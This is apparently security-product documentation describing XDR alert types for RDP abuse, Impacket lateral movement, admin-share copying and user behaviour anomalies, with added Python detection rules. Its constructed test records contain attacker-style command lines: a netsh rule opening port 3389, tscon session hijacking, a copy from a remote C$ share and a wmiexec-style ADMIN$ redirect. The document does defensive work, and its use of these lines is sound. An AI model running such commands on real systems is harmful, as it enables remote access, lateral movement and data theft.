- Tactic: XDR EBA (XTA0001)
- Technique: XDR Process Anomaly (XT1001)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is bad_process.
Key Fields and Relevant Data Points
- process_name — name of the process
- hostip — host IP address
- hostip_host — host name
- actual — actual number of launches in the period
- typical — typical number of launches in the period
- process_user — user who launched the process
Use Case with Data Points
The number of times a process (process_name) has been launched is calculated periodically. If the volume (actual) is much larger than the typical volume (typical) of the command or of other commands in any period, an alert is triggered. The Interflow includes the name of the user who launched the process (process_user).
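The following is an added example, not Stellar Cyber code, of one way to compute the actual and typical fields described above and decide when "much larger" holds. It uses the median of past per-period launch counts as typical and the median absolute deviation as the spread, which keeps one earlier burst from raising the baseline; the multiplier K, the MIN_DELTA floor and the history values are constructed assumptions, not the product's parameters.

```python
"""
Added example, not Stellar Cyber code: a robust baseline for the Process
Anomaly use case above. typical is the median per-period launch count of the
process; its spread is the median absolute deviation (MAD) scaled to a
standard-deviation equivalent, so one earlier spike does not inflate the
baseline the way a mean would. The multiplier, floor and sample counts are
constructed assumptions.
"""
import statistics

MAD_SCALE = 1.4826  # scales MAD to sigma for roughly normal data
K = 3.0             # assumed: scaled MADs above typical that count as anomalous
MIN_DELTA = 10      # assumed: floor so a flat history still needs a real jump


def baseline(history):
    """Return (typical, spread) for a list of per-period launch counts."""
    if not history:
        return 0.0, 0.0
    typical = statistics.median(history)
    mad = statistics.median([abs(x - typical) for x in history])
    return typical, MAD_SCALE * mad


def evaluate_process(process_name, hostip, process_user, actual, history):
    """Compare this period's launch count with the baseline built from history."""
    typical, spread = baseline(history)
    threshold = typical + max(K * spread, MIN_DELTA)
    return {
        "xdr_event.name": "bad_process",
        "process_name": process_name,
        "hostip": hostip,
        "process_user": process_user,
        "actual": actual,
        "typical": typical,
        "threshold": threshold,
        "anomalous": actual > threshold,
    }


# Constructed hourly launch counts for one host.
CMD_HISTORY = [12, 15, 11, 14, 13, 12, 16, 14]        # steady interactive use
SPIKY_HISTORY = [12, 15, 11, 400, 13, 12, 16, 14]     # one earlier burst
RARE_HISTORY = [0, 0, 0, 1, 0, 0, 0, 0]               # almost never launched

if __name__ == "__main__":
    print(evaluate_process("cmd.exe", "10.0.1.20", r"CORP\jsmith", 240, CMD_HISTORY))
    print(evaluate_process("cmd.exe", "10.0.1.20", r"CORP\jsmith", 60, SPIKY_HISTORY))
    print(evaluate_process("certutil.exe", "10.0.1.20", r"CORP\jsmith", 11, RARE_HISTORY))
```

With the spiky history the mean would be about 62 launches per period, so a burst of 60 would look normal; the median-based typical stays at 13.5 and the burst is flagged. The floor handles the opposite edge case: a process that is almost never launched has zero spread, and without MIN_DELTA a single extra launch would be an anomaly.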
RDP Port Opening
Netsh commands to open TCP port 3389 were detected. This could indicate Sarwent malware attempting to establish an RDP connection. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Impair Defenses (T1562)
- Tags: [RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_port_opening.
Key Fields and Relevant Data Points
- hostip — source IP address that executed the command
- event_data.CommandLine — command that was executed
- process_name — process name
Use Case with Data Points
Commands that open TCP port 3389 are monitored, and if such netsh commands are seen, an alert is triggered. A sample Interflow includes the source IP address (hostip) and the command used (event_data.CommandLine).
RDP Registry Modification
Modifications of the property values of fDenyTSConnections and UserAuthentication to enable remote desktop connections were detected. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Modify Registry (T1112)
- Tags: [RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_registry_modification.
Key Fields and Relevant Data Points
- hostip — host IP address
- event_data.TargetObject — name of the registry key
- event_data.Details — value of the registry key
Use Case with Data Points
The property values of fDenyTSConnections and UserAuthentication are monitored, and if a possibly malicious modification of these settings to enable remote desktop connections is observed, an alert is triggered. A sample Interflow includes the source IP address (hostip) and the registry key name (event_data.TargetObject).
RDP Reverse Tunnel
An svchost hosting the RDP termsvcs service communicating with the loopback address on TCP port 3389 was detected. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Command and Control (TA0011)
- Technique: Protocol Tunneling (T1572)
- Tags: [RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_reverse_tunnel.
Key Fields and Relevant Data Points
- hostip — host IP address
- hostip_host — host name
- event_data.Image — process communicating with the loopback address
Use Case with Data Points
If an svchost hosting RDP termsvcs is found communicating with the loopback address on TCP port 3389, an alert is triggered. A sample Interflow includes the host IP address (hostip) and host name (hostip_host).
RDP Session Hijacking
A suspicious RDP session using tscon.exe or MSTSC shadowing was detected. This could indicate a hijacked RDP session. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: Lateral Movement (TA0008)
- Technique: Remote Service Session Hijacking (T1563)
- Tags: [RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_session_hijacking.
Key Fields and Relevant Data Points
- hostip — host IP address that executed the command
- event_data.CommandLine — command executed
- process_name — process name
Use Case with Data Points
If an RDP session redirect using tscon.exe or MSTSC is detected, an alert is triggered. A sample Interflow includes the host IP address (hostip), the name of the process used (process_name), and the command used (event_data.CommandLine).
RDP Settings Hijacking
Changes to RDP terminal services settings were detected. Check the IP address and block if necessary.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Defense Evasion (TA0005)
- Technique: Modify Registry (T1112)
- Tags: [RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_settings_hijack.
Key Fields and Relevant Data Points
- hostip — IP address of the host that made the setting change
- event_data.TargetObject — name of the registry key
- event_data.EventType — event type on the registry key
- event_data.Details — value of the registry key
Use Case with Data Points
RDP terminal service settings are monitored, and if changes to these settings are found, an alert is triggered. A sample Interflow includes the source IP address (hostip) and the registry key name (event_data.TargetObject).
RDP Suspicious Logon
An RDP logon with a local source IP address was detected. This could indicate a tunneled logon. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Command and Control (TA0011)
- Technique: Protocol Tunneling (T1572)
- Tags: [RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_suspicious_logon.
Key Fields and Relevant Data Points
- hostip — host IP address of the RDP server
- event_data.TargetDomainName — domain of the login account
- event_data.TargetUserName — user name of the login account
- hostip_host — host name of the RDP server
Use Case with Data Points
Remote desktop logins are monitored, and if a local source IP address is seen, an alert is triggered. A sample Interflow includes the source IP address (hostip) and host name (hostip_host).
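The following is an added example, not Stellar Cyber code, that puts the conditions described in the RDP Port Opening, RDP Registry Modification, RDP Session Hijacking and RDP Suspicious Logon use cases above into one small rule set and runs it over constructed process, registry and logon records. Field names follow the page where it gives them (hostip, process_name, event_data.CommandLine, event_data.TargetObject, event_data.Details, event_data.TargetUserName, hostip_host); event_data.LogonType and event_data.IpAddress are the standard Security event 4624 fields and are assumed here, as is the DWORD text format of event_data.Details.

```python
"""
Added example, not Stellar Cyber code: one small rule set covering the RDP Port
Opening, RDP Registry Modification, RDP Session Hijacking and RDP Suspicious
Logon use cases above, run over constructed records. event_data.LogonType and
event_data.IpAddress are the standard Security event 4624 fields (assumed).
"""
import ipaddress
import ntpath
import re
import shlex

DWORD = re.compile(r"dword\s*\(0x([0-9a-f]+)\)", re.I)


def _basename(path):
    return ntpath.basename(path or "").lower()


def _tokens(cmdline):
    try:
        return [t.lower() for t in shlex.split(cmdline or "", posix=False)]
    except ValueError:
        return (cmdline or "").lower().split()


def _dword(details):
    """Parse Sysmon-style 'DWORD (0x00000000)' registry details to an int."""
    m = DWORD.search(details or "")
    return int(m.group(1), 16) if m else None


def rdp_port_opening(ev):
    """netsh adding a firewall rule or port opening for TCP 3389."""
    if _basename(ev.get("process_name")) != "netsh.exe":
        return False
    toks = _tokens(ev.get("event_data.CommandLine"))
    opens_3389 = "localport=3389" in toks or ("portopening" in toks and "3389" in toks)
    return opens_3389 and "add" in toks and "action=block" not in toks


def rdp_registry_modification(ev):
    """fDenyTSConnections set to 0 (RDP enabled) or UserAuthentication set to 0 (NLA off)."""
    value_name = _basename(ev.get("event_data.TargetObject"))
    if value_name not in ("fdenytsconnections", "userauthentication"):
        return False
    return _dword(ev.get("event_data.Details")) == 0


def rdp_session_hijacking(ev):
    """tscon.exe redirecting a session with /dest:, or mstsc.exe shadowing with /shadow:."""
    name = _basename(ev.get("process_name"))
    toks = _tokens(ev.get("event_data.CommandLine"))
    if name == "tscon.exe":
        return any(t.startswith("/dest:") for t in toks)
    if name == "mstsc.exe":
        return any(t.startswith("/shadow:") for t in toks)
    return False


def rdp_suspicious_logon(ev):
    """RDP logon (type 10) whose source address is the RDP server itself."""
    if str(ev.get("event_data.LogonType")) != "10":
        return False
    src = ev.get("event_data.IpAddress") or ""
    try:
        loopback = ipaddress.ip_address(src).is_loopback
    except ValueError:
        loopback = False
    return loopback or src == ev.get("hostip")


RULES = {
    "rdp_port_opening": rdp_port_opening,
    "rdp_registry_modification": rdp_registry_modification,
    "rdp_session_hijacking": rdp_session_hijacking,
    "rdp_suspicious_logon": rdp_suspicious_logon,
}


def evaluate(events):
    """Return (xdr_event.name, hostip) for every rule that fires on each record."""
    return [(name, ev["hostip"]) for ev in events for name, rule in RULES.items() if rule(ev)]


HOST = "10.0.1.20"
TS = r"HKLM\System\CurrentControlSet\Control\Terminal Server"
# Constructed records: process, registry and logon events from one host.
SAMPLE_EVENTS = [
    {"hostip": HOST, "process_name": r"C:\Windows\System32\netsh.exe", "event_data.CommandLine":
        "netsh advfirewall firewall add rule name=RemoteDesktop protocol=TCP dir=in localport=3389 action=allow"},
    {"hostip": HOST, "process_name": r"C:\Windows\System32\netsh.exe", "event_data.CommandLine":
        "netsh advfirewall firewall add rule name=BlockRDP protocol=TCP dir=in localport=3389 action=block"},
    {"hostip": HOST, "event_data.TargetObject": TS + r"\fDenyTSConnections", "event_data.Details": "DWORD (0x00000000)"},
    {"hostip": HOST, "event_data.TargetObject": TS + r"\WinStations\RDP-Tcp\UserAuthentication",
     "event_data.Details": "DWORD (0x00000001)"},
    {"hostip": HOST, "process_name": r"C:\Windows\System32\tscon.exe", "event_data.CommandLine": "tscon.exe 2 /dest:console"},
    {"hostip": HOST, "hostip_host": "WS-FINANCE-07", "event_data.LogonType": 10, "event_data.IpAddress": "127.0.0.1",
     "event_data.TargetDomainName": "CORP", "event_data.TargetUserName": "jsmith"},
    {"hostip": HOST, "hostip_host": "WS-FINANCE-07", "event_data.LogonType": 10, "event_data.IpAddress": "10.0.2.15",
     "event_data.TargetDomainName": "CORP", "event_data.TargetUserName": "jsmith"},
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The netsh rule ignores action=block so that a hardening change does not fire the alert, and the registry rule keys on the value written rather than the key name alone: setting fDenyTSConnections to 1 or UserAuthentication to 1 tightens RDP and is left alone. The suspicious-logon check is the simplest form of the "local source IP" condition on the page; a loopback or self-addressed source on a type 10 logon is what a tunneled RDP session looks like from the server's side.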
RDP Suspicious Logon Attempt
An authenticated user who is not allowed to log on remotely attempted to connect through RDP. Check with the user.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] Credential Access (TA0006)
- Technique: Brute Force (T1110)
- Tags: [Internal; RDP]
Event Name
The xdr_event.name for this alert type in the Interflow data is rdp_suspicious_logon_attempt.
Key Fields and Relevant Data Points
- hostip — host IP address of the RDP server
- event_data.AccountDomain — account domain of the user trying to connect
- event_data.ClientAddress — IP address of the user trying to connect
- event_data.AccountName — account name of the user trying to connect
- hostip_host — host name of the RDP server
Use Case with Data Points
Windows remote desktop logins are monitored, and if a user who is not allowed to log on remotely tries to log in with RDP, an alert is triggered. A sample Interflow includes the source IP address (hostip) and host name (hostip_host).
Sensitive Windows Active Directory Attribute Modification
The Sensitive Windows Active Directory Attribute Modification rules are used to identify suspicious modifications of sensitive Active Directory attributes. Any one or more of these rules will trigger the Sensitive Windows Active Directory Attribute Modification alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_ad_sensitive_attribute_modification.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Sensitive Windows Active Directory Attribute Modification Alert Type
Sensitive Windows Network Share File or Folder Accessed
The Sensitive Windows Network Share File or Folder Accessed rules are used to identify suspicious access to sensitive files or folders on Windows network shares. Any one or more of these rules will trigger the Sensitive Windows Network Share File or Folder Accessed alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_sensitive_networkshare.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Sensitive Windows Network Share File or Folder Accessed Alert Type
SMB Impacket Lateralization
The execution of wmiexec, dcomexec, atexec, smbexec or PSExec from the Impacket framework was detected. Check the source host. If malicious, consider blocking the host.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Execution (TA0002)
- Technique: Windows Management Instrumentation (T1047)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is smb_impacket_lateralization.
Key Fields and Relevant Data Points
- srcip — source IP address
- srcip_host — host name of the corresponding source IP address
- event_data.CommandLine — command that was executed
- event_data.ParentCommandLine — command line of the parent process
Use Case with Data Points
If a Windows host (srcip) executes a command (wmiexec, dcomexec, atexec, smbexec, or PSExec) from the Impacket framework, an alert is triggered. A sample Interflow includes the source IP address (srcip), source host (srcip_host), and the command executed (event_data.CommandLine).
SMB Specific Service Installation
A specific service installation used by the smbexec.py tool was detected. Check the source host. If malicious, consider blocking the host.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: Execution (TA0002)
- Technique: System Services (T1569)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is smb_hack_smbexec.
Key Fields and Relevant Data Points
- srcip — source IP address
- event_data.ServiceName — name of the service installed
- srcip_host — host name of the corresponding source IP address
Use Case with Data Points
If a Windows host (srcip) performs the specific service installation used by the smbexec.py tool, an alert is triggered. A sample Interflow includes the source IP address (srcip), source host (srcip_host), and the service installed (event_data.ServiceName).
SMB Suspicious Copy
A suspicious copy command from a remote C$ or ADMIN$ share was detected. Check the source host. If malicious, consider blocking the host.
XDR Kill Chain
- Kill Chain Stage: Exploration
- Tactic: Collection (TA0009)
- Technique: Data from Network Shared Drive (T1039)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is smb_suspicious_copy.
Key Fields and Relevant Data Points
- srcip — source IP address
- srcip_host — host name of the corresponding source IP address
- event_data.CommandLine — copy command used
Use Case with Data Points
If a Windows host (srcip) uses the copy command to copy files from a remote C$ or ADMIN$ share, an alert is triggered. A sample Interflow includes the source IP address (srcip), source host (srcip_host), and the command executed (event_data.CommandLine).
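The following is an added example, not Stellar Cyber code, covering the SMB Suspicious Copy use case above and, in the same block, the SMB Impacket Lateralization use case, since both are command-line checks over the same fields (srcip, srcip_host, event_data.CommandLine, event_data.ParentCommandLine). The admin-share check is a direct reading of the page's condition: a copy verb together with a UNC path on a remote C$ or ADMIN$ share. The Impacket check is an assumption, not a rule from the page: it looks for command output redirected into a file on the loopback ADMIN$ share, the form Impacket's exec tools are widely reported to use. All records are constructed.

```python
"""
Added example, not Stellar Cyber code: checks for the SMB Suspicious Copy and
SMB Impacket Lateralization use cases above, run over constructed
process-creation records with the page's fields (srcip, srcip_host,
event_data.CommandLine, event_data.ParentCommandLine). The Impacket check is
an assumption: it looks for the command-output redirection into a file on the
loopback ADMIN$ share that Impacket's exec tools are widely reported to use.
"""
import re
import shlex

# \\host\C$ or \\host\ADMIN$ followed by a separator, whitespace or end of string
ADMIN_SHARE = re.compile(r"\\\\[^\\\s]+\\(?:c\$|admin\$)(?=\\|\s|$)", re.I)
COPY_VERBS = {"copy", "xcopy", "xcopy.exe", "robocopy", "robocopy.exe"}
IMPACKET_REDIRECT = re.compile(r"\\\\127\.0\.0\.1\\admin\$\\__\S*\s+2>&1", re.I)


def _tokens(cmdline):
    try:
        return [t.lower() for t in shlex.split(cmdline or "", posix=False)]
    except ValueError:
        return (cmdline or "").lower().split()


def admin_share_copy(cmdline):
    """Return the remote admin share a copy verb reads from, or None."""
    if not COPY_VERBS & set(_tokens(cmdline)):
        return None
    m = ADMIN_SHARE.search(cmdline or "")
    return m.group(0) if m else None


def impacket_style(cmdline):
    return bool(IMPACKET_REDIRECT.search(cmdline or ""))


def evaluate(events):
    """Return (xdr_event.name, srcip, detail) for each record a check fires on."""
    hits = []
    for ev in events:
        cmd = ev.get("event_data.CommandLine", "")
        parent = ev.get("event_data.ParentCommandLine", "")
        share = admin_share_copy(cmd)
        if share:
            hits.append(("smb_suspicious_copy", ev["srcip"], share))
        if impacket_style(cmd) or impacket_style(parent):
            hits.append(("smb_impacket_lateralization", ev["srcip"], cmd))
    return hits


def _ev(cmdline, parent="explorer.exe"):
    return {"srcip": "10.0.1.20", "srcip_host": "WS-FINANCE-07",
            "event_data.CommandLine": cmdline, "event_data.ParentCommandLine": parent}


# Constructed records: two admin-share copies, a local copy, a copy from an
# ordinary share, and a wmiexec-style command (the timestamp in the path is made up).
SAMPLE_EVENTS = [
    _ev(r"cmd.exe /c copy \\FS01\C$\Users\admin\Desktop\secrets.xlsx C:\temp\secrets.xlsx"),
    _ev(r"robocopy \\DC01\ADMIN$\Temp C:\staging /E"),
    _ev(r"copy C:\data\report.docx D:\backup\report.docx"),
    _ev(r"xcopy \\FS01\Public\docs C:\docs /S"),
    _ev(r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1",
        parent=r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
]

if __name__ == "__main__":
    for hit in evaluate(SAMPLE_EVENTS):
        print(hit)
```

The share regex stops at C$ or ADMIN$, so a copy from an ordinary named share such as \\FS01\Public does not fire, which matches the page's narrower condition; checking event_data.ParentCommandLine as well as the command itself is what lets the Impacket check see the redirection when the child process no longer carries it.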
Suspicious Access Attempt to Windows Object
The Suspicious Access Attempt to Windows Object rules are used to identify suspicious access attempts to Windows objects. Any one or more of these rules will trigger the Suspicious Access Attempt to Windows Object alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_object_access_suspicious_attempt.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Access Attempt to Windows Object Alert Type
Suspicious Activity Related to Security-Enabled Group
The Suspicious Activity Related to Security-Enabled Group rules are used to identify suspicious activity related to security-enabled groups. Any one or more of these rules will trigger the Suspicious Activity Related to Security-Enabled Group alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_suspicious_activity_related_to_security_enabled_group.
Key Fields and Relevant Data Points
- hostip — host IP address
- event_id — Windows event ID associated with the activity
- hostip_host — host name
- event_data.SubjectUserName — subject user name associated with the activity
- event_data.SubjectUserSid — subject user SID associated with the activity
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Activity Related to Security-Enabled Group Alert Type
Suspicious Connection to Another Process
The Suspicious Connection to Another Process rules are used to identify suspicious connections from one process to another. Any one or more of these will trigger the Suspicious Connection to Another Process alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_suspicious_connection_process.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Connection to Another Process Alert Type
Suspicious Handle Request to Sensitive Object
The Suspicious Handle Request to Sensitive Object rules are used to identify suspicious handle requests to sensitive objects. Any one or more of these will trigger the Suspicious Handle Request to Sensitive Object alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_suspicious_handle_request.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Handle Request to Sensitive Object Alert Type
Suspicious Powershell Script
The Suspicious Powershell Script rules are used to identify suspicious activity relating to PowerShell scripts. Any one or more of these will trigger the Suspicious Powershell Script alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is suspicious_powershell_script.
Key Fields and Relevant Data Points
- hostip — host IP address
- hostip_host — host name
- wineventlog_user — Windows user who executed the script
- event_data.ScriptBlockText — PowerShell script block text
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Powershell Script Alert Type
Suspicious Process Creation Commandline
The Suspicious Process Creation Commandline rules are used to identify suspicious activity relating to command-line process creation. Any one or more of these will trigger the Suspicious Process Creation Commandline alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is suspicious_commandline.
Key Fields and Relevant Data Points
- hostip — host IP address
- event_data.CommandLine — process creation command line
- hostip_host — host name
- wineventlog_user — Windows user who executed the command
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Process Creation Commandline Alert Type
Suspicious Windows Active Directory Operation
The Suspicious Windows Active Directory Operation rules are used to identify suspicious Windows Active Directory operations. Any one or more of these will trigger the Suspicious Windows Active Directory Operation alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_ad_suspicious_operation.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Windows Active Directory Operation Alert Type
Suspicious Windows Logon Event
The Suspicious Windows Logon Event rules are used to identify suspicious Windows logon events. Any one or more of these will trigger the Suspicious Windows Logon Event alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_suspicious_logon_event.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Windows Logon Event Alert Type
Suspicious Windows Process Creation
The Suspicious Windows Process Creation rules are used to identify suspicious activity associated with process creation. Any one or more of these will trigger the Suspicious Windows Process Creation alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_suspicious_process_creation.
Key Fields and Relevant Data Points
- hostip — host IP address
- process_name — process associated with the activity
- hostip_host — host name
- wineventlog_user — Windows user associated with the activity
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Windows Suspicious Process Creation Alert Type
Suspicious Windows Service Installation
The Suspicious Windows Service Installation rules are used to identify suspicious service installations. Any one or more of these will trigger the Suspicious Windows Service Installation alert type.
Event Name
The xdr_event.name for this alert type in the Interflow data is windows_security_suspicious_service_installation.
Key Fields and Relevant Data Points
- event_id — Windows event ID associated with the activity
- hostip — host IP address
- hostip_host — host name
- stellar.rule_id — Stellar Cyber rule ID
Link to Rule-Based Alert Types
Rules Contributing to Suspicious Windows Service Installation Alert Type
Uncommon Process Anomaly
An asset launched a process that has never been observed by Stellar Cyber (or been seen very rarely). This could indicate a malware attack.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: XDR EBA (XTA0001)
- Technique: XDR Process Anomaly (XT1001)
- Tags: []
Event Name
The xdr_event.name for this alert type in the Interflow data is network_uncommon_process.
Key Fields and Relevant Data Points
- process_name — name of the process
- days_silent — number of days since this process was last seen
- srcip — source IP address running the process
- process_user — name of the user running the process
Use Case with Data Points
If a process (process_name) has never been observed by Stellar Cyber or has been seen very rarely (days_silent), an alert is triggered. The Interflow includes the user (process_user) and host (srcip) that executed the process.
User Asset Access Anomaly
A user who typically uses a small, consistent number of assets logged in to a new asset. Investigate the asset and user to see if this was expected.
XDR Kill Chain
- Kill Chain Stage: Propagation
- Tactic: [Internal] XDR UBA (XTA0004)
- Technique: XDR Asset Anomaly (XT4004)
- Tags: [Internal; User Behavior Analytics]
Event Name
The xdr_event.name for this alert type in the Interflow data is user_asset_access.
Key Fields and Relevant Data Points
- srcip_usersid — source user ID
- srcip_host — host name of corresponding source IP address
- dstip_host — host name of corresponding destination IP address
- srcip_username — source user name
- stability — score measuring the time since the last new asset was accessed
- diversity — score measuring the number of assets that the user accessed
- days_stable — time since the last new asset was accessed
- child_count — number of assets that the user accessed
Use Case with Data Points
Users (srcip_usersid and srcip_username) with a small number of assets (diversity, child_count) who also have not used a new asset (srcip_host) for a long time (stability, days_stable) are examined. If a new asset appears on a host (srcip_host) with this user, an alert is triggered.
The user is identified with the srcip_usersid and srcip_username fields. The asset is identified with the srcip_host field. Active Directory, which is identified from the dstip_host field, provides the relationship between the user and the asset. Stability is identified with the stability field and diversity is identified with the diversity field.
User Login Location Anomaly
A user logged in from an anomalous location. Check with the user.
This alert type has a relatively long detection delay of up to 40 minutes because it waits for login events from high latency data sources and is sensitive to the event order of user logins.
XDR Kill Chain
- Kill Chain Stage: Initial Attempts
- Tactic: [External] XDR UBA (XTA0004)
- Technique: XDR Location Anomaly (XT2001)
- Tags: [External; User Behavior Analytics]
Event Name
The xdr_event.name for this alert type in the Interflow data is user_login_region.
Key Fields and Relevant Data Points
- srcip_usersid — source user ID
- distance_deviation — deviation in distance between two login locations (miles)
- srcip_host — host name of corresponding source IP address
- srcip_reputation — source reputation
- srcip_geo.countryName — source country
- srcip_geo.region — source region
- srcip_geo.city — source city
- dstip_host — host name of corresponding destination IP address
- login_type — type of login
Use Case with Data Points
Successful login events for certain login types (login_type) of a user (srcip_usersid) from a source host (srcip_host) and country location (srcip_geo.countryName) are examined. If the detected login location is too far away (distance_deviation, in miles) from that user's typical locations, an alert is triggered. The source host's reputation (srcip_reputation) is also checked. Map views of the Interflow include data points for the closest typical login locations for the user.
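As an added illustration (not Stellar Cyber code), here is one way the distance_deviation check can be computed: the great-circle distance in miles from the login's srcip_geo coordinates to the closest of the user's typical locations, compared with a cut-off. The lat/lon keys, the 500-mile threshold, the sample cities and the login event are all assumptions constructed for the example.

```python
"""Added example, not Stellar Cyber code: a distance_deviation check for the
User Login Location Anomaly alert type. Threshold, lat/lon field names and all
sample coordinates are constructed assumptions."""
from math import asin, cos, radians, sin, sqrt
from typing import Optional

EARTH_RADIUS_MILES = 3958.8      # the page reports distance_deviation in miles
MAX_DEVIATION_MILES = 500.0      # assumed cut-off; the product does not publish its own

def haversine_miles(lat1: float, lon1: float, lat2: float, lon2: float) -> float:
    """Great-circle distance between two points given in decimal degrees, in miles."""
    lat1, lon1, lat2, lon2 = map(radians, (lat1, lon1, lat2, lon2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * EARTH_RADIUS_MILES * asin(sqrt(a))

def distance_deviation(login: dict, typical: list) -> tuple:
    """Return (miles to the closest typical location, that location).
    Locations are dicts with an assumed city/lat/lon layout."""
    closest = min(typical, key=lambda t: haversine_miles(login["lat"], login["lon"], t["lat"], t["lon"]))
    return haversine_miles(login["lat"], login["lon"], closest["lat"], closest["lon"]), closest

def evaluate_login(event: dict, typical: list) -> Optional[dict]:
    """Return an alert shaped like the page's key fields, or None when the login
    is within MAX_DEVIATION_MILES of one of the user's typical locations."""
    deviation, closest = distance_deviation(event["srcip_geo"], typical)
    if deviation <= MAX_DEVIATION_MILES:
        return None
    return {"srcip_usersid": event["srcip_usersid"], "srcip_host": event["srcip_host"],
            "login_type": event["login_type"], "distance_deviation": round(deviation, 1),
            "srcip_geo.countryName": event["srcip_geo"]["countryName"],
            "closest_typical": closest["city"]}     # what the map view would plot

# Constructed sample data: two typical login cities for one user.
TYPICAL = [{"city": "San Jose", "lat": 37.34, "lon": -121.89},
           {"city": "Austin", "lat": 30.27, "lon": -97.74}]

def sample_login(city: str, lat: float, lon: float) -> dict:
    """Constructed login event; the SID, host and login_type value are placeholders."""
    return {"srcip_usersid": "S-1-5-21-0-0-0-1001", "srcip_host": "vpn-gw-01", "login_type": 10,
            "srcip_geo": {"countryName": "United States", "city": city, "lat": lat, "lon": lon}}
```

A login from Palo Alto lands a few miles from San Jose and returns None; one from Chicago is roughly 980 miles from Austin, its closest typical location, and produces an alert.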
User Process Usage Anomaly
A user who typically executes a small, consistent number of processes suddenly executed a new process. Investigate the process, to see if it is benign. Check with the user to see if this process was expected.
XDR Kill Chain
- Kill Chain Stage: Persistent Foothold
- Tactic: XDR EBA (XTA0001)
- Technique: XDR Process Anomaly (XT1001)
- Tags: [User Behavior Analytics]
Event Name
The xdr_event.name for this alert type in the Interflow data is user_uncommon_process.
Key Fields and Relevant Data Points
- srcip_usersid — non-Windows source user ID, or
- user.identifier — Windows source user ID
The key field for this alert type can be either srcip_usersid or user.identifier, depending on the data feed.
- process_name — name of the process
- srcip_host — host name of corresponding source IP address
- dstip_host — host name of corresponding destination IP address
- srcip_username — source user name
- stability — score measuring the time since the last new process was executed
- diversity — score measuring the number of processes that the user executed
- days_stable — time since the last new process was executed
- child_count — number of processes that the user executed
Use Case with Data Points
Looks for a user (srcip_usersid or user.identifier, and srcip_username) with a small number of processes (diversity, child_count) who also has not used a new process for a long time (stability, days_stable). If a new process (process_name) appears on a host (srcip_host) with this user and connects to another host (dstip_host), an alert is triggered.
